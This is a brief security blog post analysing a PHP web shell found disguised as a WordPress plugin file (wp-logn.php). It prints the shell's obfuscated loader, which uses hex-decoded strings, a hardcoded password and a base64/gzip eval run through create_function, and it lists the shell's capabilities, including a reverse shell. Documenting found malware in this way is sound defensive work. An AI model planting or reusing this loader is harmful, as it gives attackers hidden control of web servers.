Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the copy-the-code domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /var/www/html/pcx3.com/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the pb-seo-friendly-images domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /var/www/html/pcx3.com/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the johannes domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /var/www/html/pcx3.com/wp-includes/functions.php on line 6121
yet another variation of the CMSmap – WordPress Shell - PC✗3
Are you a 🤖?
Search
Search
yet another variation of the CMSmap – WordPress Shell
Add comment
Share:XRedditLinkedIn

yet another variation of the CMSmap – WordPress Shell

March 15, 2021

Noticed a file named wp-logn.php file in the plugins directory that was trying to pass as a WordPress plugin, with the following code:

<?php
$password='will';
$shellname='will';
$myurl=null;
error_reporting(0);
@set_time_limit(0);
    function Class_UC_key($string){
		$array = strlen (trim($string));
		$debuger = '';
		for($one = 0;$one < $array;$one+=2) {
			$debuger .= pack ("C",hexdec (substr ($string,$one,2)));
		}
		return $debuger;
	}
header("content-Type: text/html; charset=gb2312");
$filename=Class_UC_key("2470617373776F72643D27").$password.
Class_UC_key("273B247368656C6C6E616D653D27").$Username.
Class_UC_key("273B246D7975726C3D27").$Url.
Class_UC_key("273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827").'eJzsvfl3XMdxKPwzdI7+h6vrMe+MNBjMYCMJcCCCWEhQIABhISUSPPNmuRhcYmbueBYsJPHHyHxJFFk5FimSWrhJJGVJpCTSIkXJOkriKI7zHH3Ke7ET2/GS81VVL7fvNhhQUhyfI9kS5nZXV3dXd1dXVVdX27lMvZGtNaY8f8Dk7fBIg==\')));';
$PHP=Create_Function('',$filename);$PHP();?>

Upon opening it in the browser the following login page pops up, the password in our case was will

login 1024x545 - yet another variation of the CMSmap – WordPress Shell

This pretty basic PHP web shell was written in Chinese and it offers general shell functionality:

  • view server information
  • upload and modify files
  • execute PHP and SQL code
  • Scan ports
  • Reverse shell
  • upload 1024x509 - yet another variation of the CMSmap – WordPress Shell
  • php 1024x506 - yet another variation of the CMSmap – WordPress Shell
  • sql 1024x509 - yet another variation of the CMSmap – WordPress Shell
  • shell 1024x492 - yet another variation of the CMSmap – WordPress Shell
Share:XRedditLinkedIn
whoami
Stefan Pejcic
Join the discussion

I enjoy constructive responses and professional comments to my posts, and invite anyone to comment or link to my site.

You may also like

Menu